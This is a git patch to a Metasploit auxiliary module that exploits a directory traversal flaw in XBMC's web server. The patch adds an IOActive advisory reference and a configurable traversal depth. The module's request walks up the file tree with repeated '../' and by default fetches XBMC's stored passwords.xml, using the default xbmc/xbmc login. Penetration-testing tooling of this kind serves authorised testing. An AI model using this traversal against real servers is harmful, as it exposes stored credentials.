From 2cdeca54225b092ee508bf9043b6fec2dcbb69d5 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Tue, 5 Feb 2013 14:32:50 -0500 Subject: [PATCH] Added reference & depth Added reference to IOActive's release. Added a depth option to allow user to specify how many folders to traverse. --- modules/auxiliary/scanner/http/xbmc_traversal.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb index 2828421109..2f43b36077 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -31,6 +31,7 @@ class Metasploit3 < Msf::Auxiliary [ ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'], ['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'], + ['URL', 'http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf'], ], 'DisclosureDate' => "Nov 4 2012" )) @@ -39,6 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(8080), OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']), + OptInt.new('DEPTH', [true, 'The max traversal depth', 9]), OptString.new('USER', [true, 'The username to use for the HTTP server', 'xbmc']), OptString.new('PASS', [true, 'The password to use for the HTTP server', 'xbmc']), ], self.class) @@ -54,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary end # Create request - traversal = "../../../../../../../../.." #The longest of all platforms tested was 9 deep + traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}",